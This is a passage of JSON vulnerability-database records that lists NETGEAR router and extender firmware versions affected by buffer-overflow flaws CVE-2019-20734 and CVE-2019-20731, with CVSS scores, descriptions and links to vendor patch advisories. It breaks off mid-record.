"version": "1.0.9.6"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "ex6150v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6700v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.32"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6130_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
}
]
},
"cve": "CVE-2019-20734",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2019-20734",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015451",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-63380",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-20734",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2019-20734",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015451",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20734",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20734",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2019-015451",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-63380",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1345",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-20734",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"db": "VULMON",
"id": "CVE-2019-20734"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1345"
},
{
"db": "NVD",
"id": "CVE-2019-20734"
},
{
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.40, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6300v2 before 1.0.4.18, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6700v3 before 1.0.2.32, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R6900P before 1.0.0.56, R7000P before 1.0.0.56, R7100LG before 1.0.0.42, R7300DST before 1.0.0.54, R7900 before 1.0.1.26, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, and WNR3500Lv2 before 1.2.0.46. NOTE: this may be a result of an incomplete fix for CVE-2017-18864. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D6220, etc. are all products of NETGEAR. NETGEAR D6220 is a wireless modem. NETGEAR R6300 is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. This affects D6220 prior to 1.0.0.40, D8500 prior to 1.0.3.39, EX3700 prior to 1.0.0.70, EX3800 prior to 1.0.0.70, EX6000 prior to 1.0.0.30, EX6100 prior to 1.0.2.22, EX6120 prior to 1.0.0.40, EX6130 prior to 1.0.0.22, EX6150v1 prior to 1.0.0.42, EX6200 prior to 1.0.3.88, EX7000 prior to 1.0.0.66, R6300v2 prior to 1.0.4.18, R6400 prior to 1.0.1.24, R6400v2 prior to 1.0.2.32, R6700 prior to 1.0.1.22, R6700v3 prior to 1.0.2.32, R6900 prior to 1.0.1.22, R7000 prior to 1.0.9.6, R6900P prior to 1.0.0.56, R7000P prior to 1.0.0.56, R7100LG prior to 1.0.0.42, R7300DST prior to 1.0.0.54, R7900 prior to 1.0.1.26, R8300 prior to 1.0.2.106, R8500 prior to 1.0.2.106, WN2500RPv2 prior to 1.0.1.54, and WNR3500Lv2 prior to 1.2.0.46",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20734"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"db": "VULMON",
"id": "CVE-2019-20734"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20734",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-63380",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1345",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-20734",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"db": "VULMON",
"id": "CVE-2019-20734"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1345"
},
{
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"id": "VAR-202004-0754",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
}
],
"trust": 1.0773654625925926
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
}
]
},
"last_update_date": "2024-11-23T22:25:33.201000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, Gateways, and Extenders, PSV-2017-0791",
"trust": 0.8,
"url": "https://kb.netgear.com/000061192/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0791"
},
{
"title": "Patch for NETGEAR buffer overflow vulnerability (CNVD-2021-63380)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/287176"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=114904"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1345"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20734"
},
{
"trust": 1.7,
"url": "https://kb.netgear.com/000061192/security-advisory-for-pre-authentication-buffer-overflow-on-some-routers-gateways-and-extenders-psv-2017-0791"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20734"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"db": "VULMON",
"id": "CVE-2019-20734"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1345"
},
{
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"db": "VULMON",
"id": "CVE-2019-20734"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1345"
},
{
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"date": "2020-04-16T00:00:00",
"db": "VULMON",
"id": "CVE-2019-20734"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1345"
},
{
"date": "2020-04-16T20:15:13.553000",
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63380"
},
{
"date": "2020-05-05T00:00:00",
"db": "VULMON",
"id": "CVE-2019-20734"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015451"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1345"
},
{
"date": "2024-11-21T04:39:13.173000",
"db": "NVD",
"id": "CVE-2019-20734"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1345"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015451"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1345"
}
],
"trust": 0.6
}
}
var-202004-0803
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.18, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.34, R7300DST before 1.0.0.62, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.54, and WNDR3400v3 before 1.0.1.18. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0803",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.20"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.26"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "ex6150v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.74"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63378"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
},
{
"db": "NVD",
"id": "CVE-2019-20731"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6130_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015432"
}
]
},
"cve": "CVE-2019-20731",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
